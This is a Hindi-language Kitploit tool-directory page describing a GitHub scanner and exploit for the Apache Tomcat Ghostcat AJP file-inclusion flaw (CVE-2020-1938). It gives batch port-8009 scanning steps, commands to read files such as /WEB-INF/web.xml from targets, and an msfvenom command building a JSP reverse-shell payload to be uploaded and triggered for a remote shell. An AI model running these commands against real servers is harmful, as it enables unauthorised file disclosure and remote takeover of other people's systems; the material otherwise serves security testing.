Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CNVD-2020-10487 — CVE-2020-1938 / CNVD-2020-1048 डिटेक्शन टूल्स | Kitploit
उपकरण/GitHubGitHub/doggycheng/cnvd-2020-10487
भेद्यता स्कैनरशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

CVE-2020-1938 / CNVD-2020-1048 डिटेक्शन टूल्स

रिपॉजिटरी देखें
866 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

यह टूल केवल सुरक्षा अनुसंधान और आंतरिक स्व-निरीक्षण के लिए है। टूल का उपयोग करके अवैध हमले करना प्रतिबंधित है; परिणामों की जिम्मेदारी उपयोगकर्ता की होगी।

Apache Tomcat फ़ाइल समावेशन भेद्यता (CVE-2020-1938 / CNVD-2020-1048) बैच डिटेक्शन टूल।

यह प्रोजेक्ट Kit4y के प्रोजेक्ट के आधार पर संशोधित किया गया है।

कोड संशोधन

जब ip.txt में केवल 1 डोमेन या आईपी होता है, तो threadCount 1 हो जाता है, जिससे प्रोग्राम वास्तव में नहीं चलता। थ्रेड्स की संख्या जाँचने के लिए कोड जोड़ा गया।

root@kitploit:~
...
if threadCount == 1:
    threadCount = 2
for i in range(0,threadCount-1):
...
Python3 के साथ संगत बनाने के लिए थोड़ा कोड संशोधित किया गया। संशोधन से पहले का कोड:
root@kitploit:~
self.stream = self.socket.makefile("rb", bufsize=0)
root@kitploit:~
print("".join([d.data for d in data]))
संशोधन के बाद का कोड:
root@kitploit:~
if sys.version_info < (3, 0):
    self.stream = self.socket.makefile("rb", bufsize=0)
else:
    self.stream = self.socket.makefile("rb", buffering=None)
root@kitploit:~
if sys.version_info < (3, 0):
    print("".join([d.data for d in data]))
else:
    print(b"".join([d.data for d in data]).decode("UTF-8"))

उपयोग

बैच डिटेक्शन

1. स्कैन किए जाने वाले डोमेन/आईपी को ip.txt में रखें, उदाहरण के लिए:

127.0.0.1
www.baidu.com
www.google.com

2. python threading-find-port-8009.py

ip.txt में मौजूद डोमेन/आईपी को स्कैन करके 8009 पोर्ट खुला होने वालों को ढूँढ़ें, और उन्हें जनरेट की गई 8009.txt में संग्रहीत करें।

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

8009.txt में से भेद्यता से मेल खाने वाले URL को फ़िल्टर करके vul.txt में रखें। अंत में vul.txt में मौजूद डोमेन ही भेद्यता वाले डोमेन हैं।

एकल साइट डिटेक्शन

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

क्रॉस-डायरेक्टरी और रिवर्स शेल

डिफ़ॉल्ट रूप से webapps के अंतर्गत ROOT पढ़ा जाता है। “/asdf” को “/test/asdf” में बदलने पर webapps के अंतर्गत test निर्देशिका की सामग्री तक पहुँचा जा सकता है।

root@kitploit:~
t.perform_request('/asdf',attributes=[

यदि सर्वर में फ़ाइल अपलोड भेद्यता भी मौजूद है, तो नीचे दिया गया shell.txt अपलोड करें।

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt

“/asdf” को “/asdf.jsp” में बदलें। MSF शुरू करने के बाद PoC टूल का उपयोग करके शेल प्राप्त किया जा सकता है।

अन्य संबंधित टूल

https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487

टूल डाउनलोड करें